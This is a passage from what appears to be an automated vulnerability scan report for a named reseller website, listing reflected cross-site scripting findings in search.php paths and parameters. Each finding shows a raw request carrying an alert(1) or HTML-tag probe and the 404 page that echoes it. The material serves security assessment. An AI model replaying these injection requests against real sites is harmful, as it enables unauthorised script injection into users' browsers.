GET /detail/14/themes/kosmos/images/ratinge9983<script>alert(1)</script>385e627a963/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/kosmos/images/ratinge9983<script>alert(1)</script>385e627a963/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1172. http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/search.php [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload df1f7<script>alert(1)</script>4b7eab0c351 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/themes/kosmos/images/rating/search.phpdf1f7<script>alert(1)</script>4b7eab0c351?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/kosmos/images/rating/search.phpdf1f7<script>alert(1)</script>4b7eab0c351?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1173. http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/14/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 87fa4<a>03d55b74d7 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/14/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search87fa4<a>03d55b74d7&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search87fa4<a>03d55b74d7&opt=2 was not found on this server.</p>
...[SNIP]...

2.1174. http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/14/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload d3d05<a>463d779ec80 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/14/themes/kosmos/images/rating/search.php?keyword=search...d3d05<a>463d779ec80&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/kosmos/images/rating/search.php?keyword=search...d3d05<a>463d779ec80&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1175. http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e9327<script>alert(1)</script>b5ba210fefc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&e9327<script>alert(1)</script>b5ba210fefc=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&e9327<script>alert(1)</script>b5ba210fefc=1 was not found on this server.</p>
...[SNIP]...

2.1176. http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/14/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 5d2b6<a>8967e11f027 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/14/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=25d2b6<a>8967e11f027 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=25d2b6<a>8967e11f027 was not found on this server.</p>
...[SNIP]...

2.1177. http://www.resellerbase.com/detail/14/themes/kosmos/images/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload abdde<script>alert(1)</script>e1735245848 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailabdde<script>alert(1)</script>e1735245848/14/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailabdde<script>alert(1)</script>e1735245848/14/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1178. http://www.resellerbase.com/detail/14/themes/kosmos/images/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1e0d4<script>alert(1)</script>63d23e8b42 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/141e0d4<script>alert(1)</script>63d23e8b42/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/141e0d4<script>alert(1)</script>63d23e8b42/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1179. http://www.resellerbase.com/detail/14/themes/kosmos/images/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload dff22<script>alert(1)</script>b7baf494ee4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/themesdff22<script>alert(1)</script>b7baf494ee4/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themesdff22<script>alert(1)</script>b7baf494ee4/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1180. http://www.resellerbase.com/detail/14/themes/kosmos/images/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2b797<script>alert(1)</script>3a53ae4400d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/themes/kosmos2b797<script>alert(1)</script>3a53ae4400d/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/kosmos2b797<script>alert(1)</script>3a53ae4400d/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1181. http://www.resellerbase.com/detail/14/themes/kosmos/images/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 7bcfe<script>alert(1)</script>2b6f7660de4 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/themes/kosmos/images7bcfe<script>alert(1)</script>2b6f7660de4/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/kosmos/images7bcfe<script>alert(1)</script>2b6f7660de4/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1182. http://www.resellerbase.com/detail/14/themes/kosmos/images/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload c965a<script>alert(1)</script>638032c76a1 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/themes/kosmos/images/search.phpc965a<script>alert(1)</script>638032c76a1?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/kosmos/images/search.phpc965a<script>alert(1)</script>638032c76a1?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1183. http://www.resellerbase.com/detail/14/themes/kosmos/images/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/14/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload d0db3<a>69ad84d9002 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/14/themes/kosmos/images/search.php?keyword=search...&Submit3=Searchd0db3<a>69ad84d9002&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/kosmos/images/search.php?keyword=search...&Submit3=Searchd0db3<a>69ad84d9002&opt=2 was not found on this server.</p>
...[SNIP]...

2.1184. http://www.resellerbase.com/detail/14/themes/kosmos/images/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/14/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload f9097<a>1db2c19b429 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/14/themes/kosmos/images/search.php?keyword=search...f9097<a>1db2c19b429&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/kosmos/images/search.php?keyword=search...f9097<a>1db2c19b429&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1185. http://www.resellerbase.com/detail/14/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b7cff<script>alert(1)</script>99d9e0c6c96 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&b7cff<script>alert(1)</script>99d9e0c6c96=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&b7cff<script>alert(1)</script>99d9e0c6c96=1 was not found on this server.</p>
...[SNIP]...

2.1186. http://www.resellerbase.com/detail/14/themes/kosmos/images/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/14/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 458e5<a>bb962339ef8 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/14/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2458e5<a>bb962339ef8 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2458e5<a>bb962339ef8 was not found on this server.</p>
...[SNIP]...

2.1187. http://www.resellerbase.com/detail/14/themes/kosmos/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1cc4d<script>alert(1)</script>c7959173e68 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail1cc4d<script>alert(1)</script>c7959173e68/14/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail1cc4d<script>alert(1)</script>c7959173e68/14/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1188. http://www.resellerbase.com/detail/14/themes/kosmos/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e5351<script>alert(1)</script>615983e18b7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14e5351<script>alert(1)</script>615983e18b7/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
